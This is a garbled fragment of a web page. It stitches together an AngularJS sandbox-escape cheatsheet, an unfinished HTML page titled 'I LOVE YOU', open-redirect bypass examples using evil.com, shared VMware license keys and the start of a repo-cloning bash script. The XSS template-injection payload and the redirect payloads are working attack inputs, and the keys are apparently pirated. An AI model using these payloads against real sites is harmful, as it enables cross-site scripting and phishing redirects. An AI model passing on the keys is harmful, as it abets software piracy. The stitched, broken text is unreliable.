# Angular Sandbox Escapes Cheatsheet
Source: XSS without HTML: Client-Side Template Injection with AngularJS
1.0.1 - 1.1.5 Mario Heiderich (Cure53)
{{constructor.constructor('alert(1)')()}}
1.2.0 - 1.2.1
| <!DOCTYPE html> | |
| <html> | |
| <head> | |
| <title>I LOVE YOU</title> | |
| <script> | |
| onload = function () { | |
| var d = document; | |
| // Fade in | |
| function feedin (feed, speed) { | |
| var filter = 0; |
Simply try to change the domain
Example: ?redirect=https://example.com --> ?redirect=https://evil.com
Bypass the filter when protocol is blacklisted using //
Example: ?redirect=https://example.com --> ?redirect=//evil.com
| Obviously using these keys may be a grey area. I use them for my computer, but there are no guarantees VMware won't sue you if you use them in a commercial environment. | |
| VMware Workstation 16 | |
| YF390-0HF8P-M81RQ-2DXQE-M2UT6 | |
| VMware Fusion Pro 12 | |
| YF390-0HF8P-M81RQ-2DXQE-M2UT6 | |
| As far as I know, this key works on both Fusion and Workstation. |
| #!/bin/bash | |
| while IFS= read -r ORG_NAME; do | |
| echo "[*] Processing organization: $ORG_NAME" | |
| mkdir -p "$ORG_NAME" | |
| cd "$ORG_NAME" || exit | |
| ##################################### | |
| # 1. Clone all non-fork repos | |
| ##################################### |